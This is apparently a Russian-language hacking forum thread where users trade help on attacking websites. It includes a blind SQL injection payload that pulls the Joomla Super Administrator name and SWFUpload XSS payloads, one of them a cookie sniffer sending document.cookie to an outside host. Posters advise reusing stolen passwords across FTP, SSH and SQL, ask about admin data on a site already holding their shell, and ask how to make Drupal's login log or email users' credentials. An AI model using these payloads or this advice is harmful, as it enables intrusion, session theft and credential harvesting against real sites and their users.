как поставели вопрос, такой получили и ответ! Так и запрос составте под блинд, посимвольно и выдергивайте: PHP: and(select ascii(mid(concat(username),1,1))>40 from jos_users where usertype=0x53757065722041646D696E6973747261746F72 limit 0,1) --
Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии? В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms
Если вам очень повезет - найдете на каких-нибудь файлопомойках. Вообще это такая самопальная цмска, которую впаривают как "разработку сайта". Есть маленькое overview: http://www.sitesapiens.ru/site_sapiens_description.pdf В таких случаях, как правило, только получив шелл\чтение на одном из сайтов. UPD: Иногда в таких случаях удается развести авторов на демку этой цмс, попробуйте написать им, прикинувшись потенциальным клиентом.
Кто слышал про GomyeCMS и про её уязвимости? Нашел только одно, и та на китайском. при переводе получается ужасно.
Вы все пары логин:пасс проверили? Попробуйте с ними достучаться на другие сервисы, ftp, ssh, sql, если открыты. Поищите что-нибудь вроде phpma где-нибудь рядом. В общем, ищите все, куда можно вбить логин:пасс и вбивайте. Также есть смысл залиться на сервак через соседние сайты и попробовать поднять локально через известные пароли.
Знакомая ситуация. Могу посоветовать немного рандомизировать пароли с помощью crunch или cupp. Даты можно косвенно выцепить из версий софта. Также иногда помогают exif-данные загруженных картинок или last-modified заголовки на некоторые страницы.
Подскажите, что означает запрос в логах сайта на wordpress : GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1 где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель. Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
я слышал что в базах некоторых интернет-шопов хранится информация о карточках, которую продают, Что она вообще из себя представляет?
Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload. Алерт отлично отрабатывает: http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);// Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает: http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;// Даже банальная переадресация, также не отрабатывает: http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';// Подскажите пожалуйста, в чем может быть причина?
Вообщем такая проблема захожу на сайт в админку.Там есть кнопка администрирования и меня перекидывает ***.ru/admin.php и просто пустая страница, такая же фигня есле же пишу вместо сайта его ip/phpmyadmin просто пустая формаю, может какая защита
Есть шелл на сайте, которого использует webAsyst, подскажите пожалуйста в каком файле лежат данные администратора.
Требуется подправить скрипт авторизации в drupal 6+, чтобы сохранялись данные авторизаций в файлике или отсылались на почту. Я так понимаю править нужно modules/user/user.module . Но что то неполучается все правильно сделать, ошибку сайт выдает, при попытке авторизации. Как правильно все настроить?